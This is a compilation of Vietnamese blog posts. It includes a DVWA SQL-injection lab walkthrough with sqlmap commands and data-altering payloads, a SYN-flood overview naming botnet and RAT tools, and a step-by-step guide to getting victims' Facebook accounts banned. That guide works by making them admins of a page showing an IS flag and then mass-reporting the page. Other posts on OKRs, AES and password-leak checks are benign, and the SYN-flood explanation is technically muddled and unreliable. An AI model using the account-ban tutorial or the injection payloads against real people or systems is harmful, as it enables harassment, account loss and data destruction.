Bước 3: Quay lại trình duyệt FireFox, nhập id bất kì và bấm Submit

Bước 4: Quay lại Burp Suite, ta thấy Burp Suite đã bắt được request

Chúng ta lưu ý 2 dòng này:

Referer: http://localhost/dvwa/vulnerabilities/sqli/?id=3&amp;Submit=Submit
Cookie: security=low; PHPSESSID=9kb2ltm75rskjdud5b66uig8p7

Bước 5: Mở Terminal gõ lệnh:

Sqlmap -u “(1)” –cookie=”(2)” -dbs

Tại ngoặc kép thứ nhất ta thay thế (1) bằng url parameter Referer của request vừa bắt được ở Burp suite, ngoặc kép thứ hai ta thay thế (2) bằng param Cookie

Kết quả thu được:

Như vậy Database mà trang web sử dụng chính là dvwa. Chúng ta tiếp tục list ra những bảng của DB bằng lệnh:

Sqlmap -u “(1)” –cookie=”(2)” -D dvwa –-tables

thì được kết quả như sau: Database: dvwa bao gồm 2 bảng users và guestbook

Chúng ta list ra những cột của bảng users bằng lệnh:

Sqlmap -u “(1)” –cookie=”(2)” -D dvwa -T users --columns

Như vậy ta đã thu được thông tin về bảng users. Từ đây, ta có thể thao tác được với db thông qua việc injection các query thông qua ô textField ban đầu.

b. Tiến hành khai thác

Thử thêm dữ liệu người dùng

Nhập vào ô USER ID:

1’ INSERT INTO users (user_id, first_name, last_name) VALUES (“7”, “Cuong”, “Nguyen Thai”);

Thành công!

Sửa dữ liệu người dùng

Nhập vào ô USER ID:

1'; UPDATE users SET first_name = "TAI", last_name="CHAN DOI" WHERE user_id = "5";

Xóa dữ liệu người dùng

Mình thử xóa tài khoản ‘admin’ có user_id = 1

Nhập vào ô USER ID:

1’; DELETE FROM users WHERE user_id = “1”;

Thành công! Sau khi nhập lai id = 1 thì không còn hiện tài khoản admin nữa.

Hoặc sử dụng lệnh union select để hiển thị thông tin của bảng user

1' union select first_name,last_name from users;

3. Tổng kết

Với tính nghiêm trọng của các cuộc tấn công, tính dễ thực hiện một cuộc tấn công đã khiến cho SQL Injection một thời từng là hiểm họa nghiêm trọng đối với các giao dịch thương mại điện tử trên các ứng dụng Web được phát triển thiếu an toàn. Hiện nay, việc nghiên cứu SQL Injection đã có hệ thống và toàn diện hơn, mối nguy hiểm này đã giảm đi, nhưng số liệu thống kê vẫn cho thấy vấn đề này còn chưa được giải quyết triệt để.

Nguồn : viblo.asia


loading...

Hướng dẫn vui: Cách hack game Khủng long trên Chrome :))

1
hack game khung long chrome
hack game khung long chrome

Hello các bạn, chắc ở đây không ai là không biết tới tựa game huyền thoại trên Chrome này nhỉ. Không biết các bạn biết từ bao giờ cơ mà mãi tới năm lớp 12 mình mới biết :v Được thằng bạn share cho mà còn tưởng nó nói phét, mãi lâu sau có dịp “mất mạng” mới biết là nó nói thật :v Hôm nay mình sẽ hướng dẫn các bạn cách “chơi” game này :V Đương nhiên ở blog này thì cách chơi của các bạn sẽ khác rồi :v

Về cơ bản, game Khủng Long (tên tiếng Anh là Dino) này được viết bằng Javascript cho nên các bạn có thể dùng “console” để chèn thêm các đoạn code vào để “hack”. Vấn đề ở đây chỉ là chèn gì và chèn vào đâu thôi ^^.

Những cách Hack game Khủng Long của Google

Để có thể làm được điều này thì chúng ta cần mở Developer Tool của Chrome lên bằng cách bấm F12 hoặc chuột phải rồi chọn Inspect Element.

1. Cách chơi game khủng long không cần ngắt kết nối Internet

Cái này thì khá đơn giản, không biết nó có được gọi là hack không nhưng mình cứ cho vào đây ^^. Đơn giản các bạn chỉ cần truy cập vào chrome://dino/ bất cứ lúc nào để chơi thôi, bất kể máy bạn có mạng hay không. Bây giờ các bạn hãy ở Developer Tool lên theo cách mình đã nói ở trên ^^

2.Hack không đụng vào cây

Dán đoạn code này vào Console để tiến hành “hack”:

Runner.instance_.gameOver = function() {};

Bấm Enter thì từ bây giờ khủng long của bạn đã có khả năng đi “xuyên cây” 😀

3.Tăng tốc độ chạy

Để tăng tốc độ chạy cho khủng long thì các bạn sử dụng đoạn code sau đây:

Runner.instance_.setSpeed(1000);

Bạn có thể thay đổi số 1000 trong đoạn code trên thành tốc độ khác theo ý bạn.

4.Đứng yên nhưng vẫn tăng điểm

Nghĩa là chú khủng long của bạn không chuyển động như số điểm vẫn tăng lên đều đều. Chỉ cần sử dụng đoạn code dưới đây là được thôi !! Nhưng lưu ý là cách này cần được thực hiện khi khủng long vừa bắt đầu chạy nhé !!

Runner.instance_.playingIntro= true;

Vậy là mình đã hướng dẫn xong 4 cách hack game Khủng Long rồi 😀

Chúc bạn thành công, có thể khoe bạn bè được rồi đó :v

 

loading...

Tìm hiểu về OKRs (Phần 2)

1

Một doanh nghiệp muốn phát triển mạnh mẽ, tất cả các thành viên của doanh nghiệp đó cần phải hiểu được một cách chính xác về mục tiêu mà doanh nghiệp của mình đang hướng tới. OKRs giúp các doanh nghiệp thực thi được chuyện này với 3 nguyên lí cơ bản.

Nguyên lí đầu tiên, Objectives rõ ràng. Mỗi doanh nghiệp ứng dụng OKRs luôn cần có các mục tiêu rõ ràng, dễ hiểu, dễ hình dung, đếm được trên đầu ngón tay, đảm bảo tất cả mọi người từ các quản lí cao cấp đến những nhân viên mới vào công ty đều có thể hiểu dễ dàng, từ đó cùng nhau tập trung để đạt được mấy mục tiêu chung quan trọng ấy một cách thống nhất. Số lượng mục tiêu càng nhiều, càng rườm rà, phức tạp thì khả năng một doanh nghiệp thực hiện được đầy đủ càng thấp.

Nguyên lí thứ hai, Key Results đơn giản, ngắn gọn. Với mỗi mục tiêu của công ty được xác định, chỉ nên có từ 3 đến 5 kết quả then chốt (KRs) được đặt ra để xác định xem mục tiêu ấy đã hoàn thành hay chưa. Nếu tham lam đặt ra quá nhiều KRs làm thước đo cho một mục tiêu nào đó, đội ngũ nhân viên sẽ dễ bị phân tán sự tập trung dẫn tới khó lòng đạt được các KRs để hoàn thành mục tiêu.

Chuyện này giống như một vị phụ huynh đặt ra chỉ tiêu cho con mình rằng muốn được công nhận là ngoan thì cần đạt điểm cao cho tất cả các môn ở trường, lại còn bắt con phải biết đánh đàn, múa võ, làm thơ, sẽ rất khó cho đứa trẻ chiều lòng được bố mẹ. Trong khi theo Bác Hồ thì “Trẻ em như búp trên cành/Biết ăn ngủ, biết học hành là ngoan”. Bác Hồ chính là một tấm gương ứng dụng OKRs vào việc quản trị xã hội dù Bác chưa bao giờ biết đến mô hình này.

Nguyên lí thứ ba, áp dụng OKRs cần có khung thời gian, chu kì xác định, thường là theo thời đoạn 3 tháng. Một quý là vừa đủ để kế hoạch hóa, chỉnh sửa và thực hiện mục tiêu thông qua các kết quả chủ chốt, không ngắn cũng không quá dài. 3 tháng cũng thường phù hợp với kế hoạch tài chính của các doanh nghiệp và tương thích với các chu kì tuần hoàn của nhiều hệ thống khác trong xã hội. Ta cũng có thể thử 2 tháng hoặc 4 tháng nếu thấy thích hợp với doanh nghiệp của mình.

Việc hiểu được đơn giản và rõ ràng về mục tiêu của doanh nghiệp mình cũng có nghĩa là hiểu rõ điều gì không nên làm. Remind.com là một nền tảng tin nhắn phục vụ các trường học ở Mỹ giao tiếp giữa giáo viên, phụ huynh và học sinh. Khi bắt đầu phát triển, Remind.com đã đứng trước một thử thách: rất nhiều người dùng yêu cầu có tính năng “gửi thông báo lặp lại”, giúp các giáo viên không phải vào hệ thống mà vẫn có thể gửi đi các thông báo đều đặn cho học sinh hằng tuần. Nhưng với quyết tâm ứng dụng OKRs, CEO của Remind.com lúc đó đã chỉ ra rằng tính năng này không thích hợp với mục tiêu chung bấy giờ của công ty là gia tăng độ gắn bó của các giáo viên với hệ thống và quyết không đáp ứng yêu cầu của người sử dụng. Nhờ việc tập trung vào mục tiêu của mình, Remind.com hiện được 50% số trường phổ thông ở Mỹ sử dụng với lượng user lên tới 20 triệu người và đã gọi được 40 triệu đô la vốn ở vòng đầu tư Series C.

OKRs chứa nhiều triết lí hơn những gì mang tính kĩ thuật đơn giản ở bên trong nó. Những người nhìn sâu vào OKRs sẽ trông thấy cách một hệ đa tác tử phức tạp được đặt dưới các mục tiêu rất đơn giản để các tác tử có thể tự tương tác với nhau và tối ưu cho mục đích toàn cục bằng cách này hay cách khác, tận dụng tối đa sự thông minh của từng tác tử. Sự hiệu quả của các mô hình ứng dụng OKRs có thể nằm ngoài khả năng giải thích của con người. OKRs rất gần với reinforcement learning và multi agents system trong Trí tuệ nhân tạo.

Viết trong lúc ngồi ở một quán bar trên đường Bùi Viện, Sài Gòn. Tiếng nhạc chát chúa và rất nhiều người qua lại, rất khó tập trung nhưng chạy theo luồng suy nghĩ riêng của mình giữa đám hỗn độn đó thấy khá thú vị.

Đọc lại phần 1 : https://anonymousvn.org/tim-hieu-ve-okrs-phan-1.hav

Nguồn : Anh Lê Công Thành :https://www.facebook.com/lezomeo/posts/10156005182306172

loading...

Làm gì khi bạn cảm thấy bế tắc trong việc hack?

0

Hacking nghe qua có vẻ là một công việc khá tẻ nhạt. Đôi khi đã tìm kiếm hàng giờ, thậm chí cả ngày mà bạn không tìm ra lỗ hổng bảo mật nào, cảm giác này có thể sẽ khiến bạn thất vọng, chán nản khi phải “hack”. Trong bài viết này, mình sẽ chia sẻ kinh nghiệm của mình để bạn có thể lấy lại được cảm giác khi “báo cáo lỗ hổng bảo mật”.

Cảm giác chán nản trong khi hack
Cảm giác chán nản trong khi hack

Điều đầu tiên mà mình cảm thấy khá quan trọng, đó chính là bạn phải biết bạn đang tìm kiếm điều gì, rất nhiều các bạn newbie, ngồi vào máy tính là cắm đầu “tìm kiếm một cái gì đó” mà không hề chỉ định rõ ràng từ đầu xem mình đang tìm cái gì. Điều này dẫn tới việc bạn lướt qua các page rất nhanh mà không chú ý quá nhiều, hoặc bạn tự nhủ rằng đã tìm kiếm hết rồi nhưng không thấy gì. Vì vậy, bất cứ khi nào bạn cảm thấy khó khăn, hãy tự hỏi mình câu hỏi này.

Mình đang tìm kiếm cái gì ? Lỗ hổng nào?

Hãy chắc chắn rằng bạn có một mục tiêu rõ ràng. Ví dụ, câu trả lời cho câu hỏi này không bao giờ là “Tôi đang tìm kiếm lỗ hổng bảo mật.” Thay vào đó, nó có thể là “Trong hai giờ tiếp theo, tôi đang tìm kiếm lỗ hổng bảo mật Insecure Direct Object Reference (IDOR).” điều này mang lại cho bạn rất nhiều lợi ích khác như:

  • Bạn đặt lên bạn một deadline cụ thể để cố gắng hơn
  • Bạn biết rõ cần test cái gì
  • Bạn biết cần phải đọc thêm gì để có kiến thức cho việc này
  • Bạn có thể đặt một câu hỏi cụ thể và nhận được câu trả lời trên các diễn đàn
  • Bạn biết cái nào cần ưu tiên test trước, cái nào sau

Đọc thêm : Tôi đã hack trang Sendo.vn như thế nào ?

Trong quá trình “hack”, hãy nhớ luôn note lại những gì bạn cảm thấy bất thường, từ những dòng notify, header, text trong response để sau này có thể check lại được. Mỗi khi bạn phát hiện ra một mục tiêu mới, luôn chắc chắn rằng bạn sẽ tiếp cận nó một cách “SMART”.

Tập trung suy nghĩ về mục tiêu của bạn

Có rất nhiều lí do khác nhau dẫn tới việc bạn chán nản trong quá trình “hack”, cố gắng dành nhiều thời gian để “tìm kiếm” đôi khi không phải là một cách. Mình xin phép đưa ra một số “method” mà bạn có thể tập áp dụng khi đang ở trong trạng thái “stuck”:

  • Tắt máy tính, đi ra ngoài
  • Ăn uống :))))
  • Chơi game ( tuy nhiên đừng dành full thời gian để nhìn vào màn hình điện tử)
  • Đi ngủ 😀

học tập và tìm hiểu thêm

Là một hacker, điều quan trọng là bạn phải biết những gì bạn biết, quan trọng hơn nữa, là bạn phải biết những gì bạn chưa biết. Luôn luôn nắm rõ những điều này để có thể bổ sung kiến thức cho mình ở đúng cái mà mình đang yếu. Giả sử bạn chưa bao giờ nghe về hay biết về lỗ hổng bảo mật XML External Entity (XXE), thì đây chính là cơ hội để bạn vừa học thêm về lỗi này.

Và như ở trên mình có nói:

Luôn luôn ghi chú

Có rất nhiều bạn trong quá trình hack thì không ghi chú gì cả, dẫn tới sau này khi bế tắt không biết bắt đầu lại từ đâu, bản thân mình thấy việc ghi chú mang lại rất nhiều lợi ích. Khi bạn “stuck”, bạn có thể mở lại ghi chú, đọc lại từ đầu và tư duy xem bạn nên làm gì tiếp theo, bắt đầu từ đâu. Nhân tiện mình chia sẻ với các bạn luôn công cụ ghi chú mà mình hay sử dụng, đó là recon.sh

taking note with recon sh
taking note with recon sh

Đó là lời khuyên của mình, thêm vào đó, đừng quá chán nản khi bạn đang “stuck”, hãy nhớ rằng trong công việc, ai cũng sẽ “stuck” mà thôi, không ở vấn đề này thì ở vấn đề khác, hãy tập làm quen và vượt qua nó càng đơn giản càng tốt.

Chúc bạn thành công <3

loading...

Tìm hiểu về OKRs (Phần 1)

1

OKRs (Phương pháp quản trị doanh nghiệp theo Mục tiêu và Các kết quả chính – tạm dịch) là thứ mà hiện nay nhiều người từng nghe nói đến hoặc thậm chí đã áp dụng vào doanh nghiệp của mình. Lí do vì ai cũng biết đến Google và sự thành công, giàu có của công ty này. Nên câu chuyện Google sử dụng OKRs lan truyền đi rất nhanh, khiến người ta tò mò tìm hiểu OKRs là gì.

Nhưng không phải Google là doanh nghiệp phát minh ra OKRs. Một đại gia khác cũng rất thành công và giàu có, nhà sản xuất chip máy tính hàng đầu thế giới Intel mới là nơi đẻ ra phương pháp OKRs. Người trực tiếp làm việc này ở Intel là nhà đồng sáng lập, cựu phó chủ tịch và cựu CEO của Intel, ông Andy Grove, người đã đưa Intel từ một doanh nghiệp nhỏ lên thành một đế chế công nghệ, sử dụng OKRs.

Theo triết lí của Andy Groves, điều quan trọng không phải là bạn có kiến thức gì mà điều quan trọng là bạn làm gì với các kiến thức bạn có. Nếu bạn muốn hoàn thành một điều gì đó, khả năng thực thi của bạn thậm chí quan trọng hơn cả kiến thức.

OKRs là viết tắt của Objectives and Key Results trong tiếng Anh, phương pháp chia thành 2 phần chính: phần Mục tiêu – Objectives (Os) và phần Kết quả chính – Key Results (KRs).

Ví dụ một trong những Os của Andy Groves là đưa Intel trở thành công ty số một trong lĩnh vực cung cấp linh kiện máy tính trung cấp. Một mục tiêu rất dễ hiểu. Và bằng cách đặt ra các mục tiêu đơn giản, dễ hiểu như vậy ở Intel, Andy Groves giúp cho cả công ty Intel dễ dàng cùng tập trung để tìm cách đạt được các mục tiêu ấy.

Mục tiêu thì rất chung chung, thế nào là công ty số một? Làm sao để đo đếm được cái sự “số một” ấy? Andy Groves sử dụng các Kết quả chính KRs. Cứ đạt được các KRs là đạt được mục tiêu. Ví dụ một KRs để đạt được mục tiêu bên trên là con chip 8085 của họ đạt được 10 lần “thắng” các mẫu thiết kế bo mạch máy tính – mỗi lần thắng được định nghĩa là một lần mà chip 8085 được sử dụng trong mẫu thiết kế sản phẩm của một công ty khác.

Các KRs được đo đếm rất đơn giản, chỉ bằng đại số Boolean với câu trả lời: có hay không. Tất cả những người tham gia vào việc hiện thực hóa mục tiêu đều có thể tự biết mục tiêu chung của mình đã hoàn thành hay chưa mà không cần phải tranh cãi. Đa phần rắc rối ở các doanh nghiệp khác cũng thường đến từ đây, khi mà một người nghĩ rằng mình đã hoàn thành tốt điều gì đó nhưng người khác lại không nghĩ vậy. Với OKRs thì không thế, ai cũng thống nhất với nhau được một cách dễ dàng.

Áp dụng OKRs ở Intel trong suốt 11 năm, từ 1968, Andy Groves đã giúp doanh nghiệp này tăng trưởng trung bình mỗi năm 40% và cho đến tận bây giờ, Intel vẫn là đại gia trong lĩnh vực sản xuất chip máy tính. Có một khả năng rất cao trong chiếc máy bạn đang sử dụng để đọc bài viết này có con chip của Intel.

Mình đang định áp dụng OKRs ở công ty vì đã thử nhiều phương pháp khác nhưng đều chưa đủ tốt. Mình cũng thích phương pháp này vì nhìn bên ngoài thì đơn giản nhưng bên trong là các triết lí khá sâu sắc, muốn ứng dụng đòi hỏi sự nắm bắt tâm lí cao. Mời anh em vào cùng trao đổi và thảo luận. Mình sẽ viết tiếp các phần khác khi tìm hiểu nhiều hơn về OKRs. Mình đang đọc quyển Measure what matters của John Doerr.

Andy Groves, cha đẻ của Intel cũng chính là một trong những người đã góp phần tạo ra Silicon Valley có một câu nói mà mình rất thích, thể hiện rõ ông là một người tán thành chủ nghĩa connectionism: A corporation is a living organism; it has to continue to shed its skin. Methods have to change. Focus has to change. Values have to change. The sum total of those changes is transformation.

Xem tiếp phần 2 : Tìm hiểu về OKRs (Phần 2)

Nguồn : Anh Lê Công Thành : https://www.facebook.com/lezomeo/posts/10156005182306172

loading...

Phân tích hình thức SYN – UDP FLood và cách phòng chống

0

Theo như mình quan sát một thời gian gần trước ( nửa năm ) thì ở các diễn đàn hacking lớn nước ngoài như HF hay một số diễn đàn khác, họ luôn tìm hiểu về phương pháp tấn công này và vì vậy , mình cũng đã dành nhiều công sức để nghiên cứu về cách tấn công này

I/ Giới Thiệu

SYNFLOOD là một biến thể khác của UDP/TCP flood, nhưng là gửi các gói tin synACK và không nhận trả lời khiến cho server bị dồn cục lại và “vỡ” băng thông, về mặt thực tế thì đây là module tấn công mà không xuất hiện nhiều trên các công cụ và cũng không có công cụ nào nổi tiếng nhưng đây là các tấn công hiệu quả nhất để tấn công vào các gameserver và cũng là hình thức được sử dụng mạnh nhất trong Razer Module (RDU)

II/ Phân Tích : Cách Thức

Synflood là một dạng tấn công gửi các gói tin một cách dồn dập và không cần server trả lời ví dụ như mình hỏi 1 thằng liên tục và không quan tâm những gì nó trả lời, cứ hỏi tiếp cho đến khi nó phát cáu và vỡ òa trong cảm xúc

Hình ảnh phía trên là hình ảnh ví dụ về SYNFLOOD – cách thức tấn công đã trở nên rất phổ biến trên thế giới và được nhiều attacker ưa dùng nhưng có thể thấy hình thức này khá là dễ phòng chống nếu config server cẩn thận, các gói tin sẽ được đẩy đi một cách “bình tĩnh”

III/ Hiệu Quả

Không cần phải nói nhiều về sức mạnh của hình thức tấn công này, các bạn có thể nhìn thấy sự thành công của Razer DDoS Ulimate vào nửa năm trước, đến thời điểm hiện tại thì RDU vẫn còn giữ được phong độ ổn định khi tấn công nhưng không còn được mạnh như xưa …
Synflood tấn công không chiếm quá nhiều tài nguyên server vì không tấn công vào apache , yêu cầu máy chủ hoạt động, mà là tấn công vào đường truyền của máy chủ khiến băng thông mạng của máy chủ bị cạn kiệt, khiến server tê liệt tạm thời, không có các biến chứng gì phía sau

IV/ Các Biến Thể

Theo mình biết cho đến thời điểm hiện tại thì chỉ có Razer làm 1 phiên bản biến thể của SyN đó là Razer V1 nhưng không được sử dụng đại trà, các tấn công được phối hợp giữa các cổng UDP và SYN

V/ Các công cụ tiêu biểu

– DDoS / Stressing Tools

  • Razer DDoS Ultimate

– BOTNET/RAT

  • G – Bot
  • Darkcomet RAT
  • Dirty Jumper

Cách phòng chống : Synflood là một hình thức tấn công rất hiệu quả nếu server không được config kĩ, các gói tin đơn giản sẽ có thể làm băng thông máy chủ của bạn sập ngay trong vòng tích tắc, Cách chống lại hình thức tấn công này còn phụ thuộc vào OS mà máy chủ của bạn sử dụng

– Linux
+ Sử dụng CSF để hỗ trợ tối đa config IPtables : ở trên mạng đã có khá nhiều hướng dẫn nhưng nếu bạn làm theo đảm bảo đến 1 ngày bạn cũng sẽ bị iptables lọc IP và miễn login vào server nữa, ở trong CSF có 3 giá trị để quyết định đến khả năng tấn công của SYNFLOOD
SYN_Flood = 1
Syn_Flood_Burst = 30
Syn_Flood_Rate = 28/s
– Windows
+ Sử dụng APP , có khá nhiều loại kiểm tra và chặn các gói tin này, thậm chỉ các bạn có thể sử dụng phần mềm giệt virus có tường lửa tốt như Kaspersky (KIS) , Norton , BitDefender, các phần mềm này hoàn toàn tự tinh chỉnh cho bạn và lọc các gói dữ liệu một cách cẩn thận

loading...

Tìm hiểu về thuật toán mã hóa đối xứng AES – Advanced Encryption Standard

0

AES là tên viết tắt của cụm từ Advanced Encryption Standard, chuẩn mã hóa dữ liệu cực kì phổ biến hiện nay và được dùng từ các mục đích nhỏ cho tới việc bảo vệ dữ liệu của chính phủ Mỹ.

AES là một kiểu mã hóa đối xứng dạng khối, nghĩa là mỗi khối văn bản có một kích thước nhất định (ở đây là 128 bit) được mã hóa, khác với mã hóa dạng chuỗi khi từng kí tự được mã hóa. Đối xứng nghĩa là khóa để mã hóa và giải mã đều là một.

Lịch sử của thuật toán mã hóa AES

AES được phát triển từ cuối những năm 90 với mục đích thay thế cho Data Encryption Standard (DES) do IBM tạo ra đầu những năm 70s đã dần trở nên lỗi thời và thiếu bảo mật ( bị bruteforce dễ dàng khi mà máy tính ngày càng trở nên mạnh mẽ.

Tiếp theo đó, 15 thuật toán được đề xuất để thay thế cho DES, bắt đầu quy trình 5 năm của chính phủ Mỹ. Thuật toán AES lần đầu được hai nhà mật mã học là Vincent Rijmen và Joan Daemen đề xuất, sau được gọi là “đơn Rijindael”.

AES là chuẩn mở vì khi đó chuẩn thực sự cũng chưa được xác định. Trong quá trình thiết kế, nó cũng nhận bình luận, góp ý. Nó được Viện tiêu chuẩn và kỹ thuật quốc gia Hoa Kỳ phát triển với mục tiêu dễ dùng cho cả phần cứng và phần mềm. Một số thay đổi về khóa và khối được thực hiện để tăng tính an toàn.

NSA cũng tham gia xem xét 15 bản đề xuất. Tới tháng 8/1999 chỉ còn 5 thuật toán (Rijndael, Serpent, RC6, Twofish và MARS). Các “ứng viên” được phân tích thêm về độ bảo mật, tính dễ sử dụng, bản quyền, tốc độ, độ chính xác khi mã hóa và giải mã.

Người chiến thắng sau cùng là Rijndael, sau đó được đưa lên cho chính phủ Mỹ vào năm 2002 và cả NSA cùng các tổ chức khác. Đến giờ, AES vẫn được dùng cho các tài liệu tuyệt mật, được cho là FIPS (Federal Information Processing Standard – tiêu chuẩn xử lý thông tin liên bang). Sau đó nó được dùng trong khối tư nhân, là chuẩn mã hóa phổ biến nhất với mã hóa khóa đối xứng.

AES hoạt động như thế nào?

AES là kiểu mã hóa khối, mỗi khối kích thước 128 bit. Khóa đối xứng với 3 kích thước là 128, 192 và 256 bit, trong đó 2 kích thước sau được chính phủ Mỹ dùng cho các tài liệu mật cấp cao, được gọi là “Top Secret”.

Rijndael ban đầu được phép thêm khối và tăng độ dài khóa nhưng chuẩn sau này bị bỏ, giữ chuẩn kích thước như đã nói ở trên. AES là chuẩn mã hóa duy nhất được phát hành rộng rãi được NSA chấp thuận dùng để bảo vệ thông tin chính phủ ở mức cao cấp nhất.

AES dùng thuật toán mã hóa khối mạng thay thế hoán đổi (SPN – Substitution Permutation Network). Dữ liệu được chuyển thành dạng an toàn trong vài bước, bắt đầu là khối plain text kích thước chuẩn, sau đó chèn vào hàng và sau đó là mã hóa. Mỗi lần đều có các bước thay thế, chuyển đổi, hòa trộn.

Cũng như 3DES có 3 bước mã hóa, AES cũng có nhiều bước nhưng được thực hiện nhiều hơn, phụ thuộc vào độ dài khóa, với khóa 128 bit là 10 lần, khóa 192 bit là 12 lần và khóa 256 bit là 14 lần.

Trong quá trình này, khóa mã hóa được tạo và cũng phải có khóa này để giải mã. Nếu không, dữ liệu sẽ chỉ là mớ lộn xộn không thể đọc được. Cả người gửi và người nhận đều phải biết khóa mã hóa và giải mã.

AES cho mọi người

Ngày nay ai cũng có thể dùng AES, đúng như nguồn gốc mã nguồn mở của nó. Ví dụ như qua trang AES Encryption dữ liệu được đặt vào hộp văn bản, khóa được nhập bên dưới và chọn độ dài khóa, cả 3 độ dài khóa đều được hỗ trợ. Sau đó chọn mã hóa hay giải mã là được. Dù ai cũng có thể dùng AES qua web nhưng giao diện web thiếu an toàn nên khó mà chính phủ có thể sử dụng.

AES và mạng Internet

Dù ban đầu AES được tạo ra để chính phủ Mỹ bảo mật dữ liệu nhưng nó cũng có thể dùng để chuyển dữ liệu qua mạng an toàn. AES được dùng để chia sẻ tập tin qua kết nối HTTPS, an toàn hơn HTTP, vốn được thiết kế để ngăn tấn công trung gian.

AES cũng được dùng để mã hóa WiFi trên router, khi kết hợp với giao thức phổ biến WPA2 thì có tên AES/WPA2. Giao thức bảo mật khác được dùng cùng với WPA2 là TKIP cũ hơn AES và được cho là không còn an toàn. AES cũng được dùng để hỗ trợ mã hóa SSL.

loading...

TUT report facebook 030

0
tut report facebook 030
tut report facebook 030

Chào các bạn, đã lâu rồi mình không giới thiệu đến các bạn Tut Facebook. Hôm nay được một bạn Ẩn danh share Tut Facebook Set Page Dame cực mạnh. Đây là dạng Tut đã làm Facebook của nghệ sĩ Sơn Tùng MTP bị sập. Mình chia sẽ lại Tut này là để mọi người biết cách làm để phòng tránh cho bản thân.

Nếu bạn sử dụng Tut này gây hậu quả thì mình sẽ không chịu trách nhiệm đâu nhé ! Bây giờ mình sẽ tập trung vào phần hướng dẫn Tut Set Page Dame 030 hoặc 178 không cần Add. Bạn theo dõi từng bước làm bên dưới để hiểu rõ hơn nhá.

Hướng dẫn Set Page Dame 030 hoặc 178 không cần Add

Với Tut này bạn có thể Rip nhiều người cùng một lúc. Đỡ mất thời gian để tạo !! Tuy nhiên, bạn nên thực hiện lúc nạn nhân không Online để tránh trường hợp xấu nhất nhé. Để làm được Tut Set page dame này thì bạn cần phải tạo một Trang Fanpage trên Facebook. Việc cần làm là dùng tài khoản Clone của bạn tạo một Fanpage.

Ấn vào nút hình tam giác màu trắng nhỏ ở phía góc phải trên của Facebook -> Tạo Trang.

Tiếp theo bạn chọn Trang dạng Cộng đồng hoặc Người của công chúng.

Tiến hành điền đầy đủ thông tin được yêu cầu để hoàn tất thủ tục tạo Fanpage.
Lưu ý ở chỗ hạng mục thì bạn chọn Blog cá nhân nhé !!

Sau khi tạo trang xong thì bạn thêm những nick bạn muốn Rip vào làm Jobs Manager của Fanpage.

Sau khi đã thêm các nick cần RIP rồi thì bạn đổi địa chỉ liên kết thành web mobile. Bằng cách thay thế www.facebook.com/… thành m.facebook.com/… Sau đó vào lại phần Vai trò trên trang, bạn sẽ thấy danh sách người đang quản lý hiển thị

Sau đó thay đổi quyền của tất cả nạn nhân thành Quản trị viên.

Tiếp theo đổi ảnh đại diện của Page thành ảnh cờ IS dưới đây để Facebook thấy.

Sau khi chuyển ảnh đại diện Fanpage lên xong thì nhanh chóng tự chuyển Acc của mình về Biên Tập Viên.

Tiếp theo dùng một nick Facebook khác (nick càng sử dụng lâu càng tốt) vào Page báo cáo Bạo lực là được.

Check vào ô đồng ý rồi ấn Báo cáo là được. Giờ hóng tụi nó Die hết luôn nhá !!!

Bộ ảnh chuyên dùng để Dame Page 303

Dưới đây là danh sách bộ ảnh chuyên dùng để set Dame Page 303 cực mạnh. Ngoài tấm ảnh trên thì bạn có thể dùng 01 trong những tấm ảnh dưới đây để Rip 303 mạnh hơn nhé !! Lưu ý là sau khi đổi ảnh thì phải nhanh chóng chuyển sang thực hiện bước Báo cáo trước khi nạn nhân phát hiện !!

 

loading...

Cách kiểm tra mật khẩu email của bạn có đang bị lộ hay không

0

Công cụ này do Cục An toàn thông tin thuộc Bộ Thông tin và Truyền thông phát hành.

Liên quan tới thông tin phát đi từ Trung tâm Ứng cứu khẩn cấp máy tính Việt Nam (VNCERT) về việc trung tâm này phát hiện số lượng lớn tài khoản email và mật khẩu bị lộ lọt thông tin trên toàn thế giới (từ các mạng xã hội và dịch vụ trực tuyến như Bitcoin, Pastebin, LinkedIn, MySpace, Netflix, Last.FM, Zoosk, Badoo, RedBox,…), Trung tâm xử lý tấn công mạng Internet Việt Nam (thuộc Cục An toàn thông tin, Bộ Thông tin và Truyền thông) vừa phát hành công cụ kiểm tra cho người dùng internet.

Đầu tiên, người dùng truy cập vào trang web https://khonggianmang.vn. Sau đó, gõ địa chỉ email của mình vào ô nhập liệu rồi nhấn nút “Kiểm tra”.

Trang web kiểm tra mật khẩu email có bị lộ lọt hay không.

Sau khi bấm kiểm tra, trang web sẽ thông báo: “Địa chỉ email đang được kiểm tra thông tin, vui lòng kiểm tra hòm thư điện tử để nhận kết quả. (Kiểm tra hòm thư Spam/Junk trong trường hợp không nhận được email)”. Việc tiếp theo là bạn đợi email kết quả, nếu phát hiện mật khẩu của tài khoản bị lộ thì hãy nhanh chóng đổi password mới.

Lưu ý, Cục An toàn thông tin sẽ gửi về email của bạn những mật khẩu được cho là của email nói trên, song đó có thể là mật khẩu cũ mà bạn đã thay đổi từ rất lâu.

Email thông báo kết quả.

Trước đó, VNCERT cho biết, tổng cộng có hơn 41GB dữ liệu ước tính chứa khoảng 1,4 tỉ tài khoản sử dụng thư điện tử và mật khẩu trên thế giới đã bị lộ. Trong đó, VNCERT đã phân tích và phát hiện số tài khoản sử dụng thư điện tử tại Việt Nam có đuôi “.vn” là 437.664 tài khoản (bao gồm các tài khoản sử dụng thư điện tử của cơ quan nhà nước có đuôi “gov.vn” là 930 tài khoản và rất nhiều tài khoản sử dụng thư điện tử của các tập đoàn, doanh nghiệp hạ tầng quan trọng của Việt Nam).

Theo VNCERT, việc lộ các thông tin tài khoản sử dụng thư điện tử và mật khẩu sẽ tạo điều kiện cho tin tặc sử dụng tài khoản, mật khẩu đó để dò thông tin và đăng nhập nhiều hệ thống thông tin. Nếu thành công, tin tặc sẽ chiếm đoạt tài khoản và sử dụng vào việc tấn công, đánh cắp và phá hủy hệ thống thông tin, dữ liệu.

Do đó, VNCERT yêu cầu các đơn vị và khuyến cáo người dùng cả nước thực hiện khẩn cấp việc kiểm tra, rà soát hệ thống, tăng cường chính sách mật khẩu và giải pháp xác thực nhiều lớp; thay đổi mật khẩu các tài khoản đăng nhập; không sử dụng email của đơn vị để đăng ký tài khoản cá nhân sử dụng trên mạng xã hội, dịch vụ trực tuyến.

 

loading...

Tìm hiểu về ANDRAX- Penetration Testing Platform đầu tiên trên Android

0

ANDRAX là một nền tảng pentest vừa mới được ra mắt ngày hôm qua (09/10/2018) và cho tới hiện nay thì nó đang là nền tảng cho phép pentest đầu tiên trên các smartphones chạy hệ điều hành android.

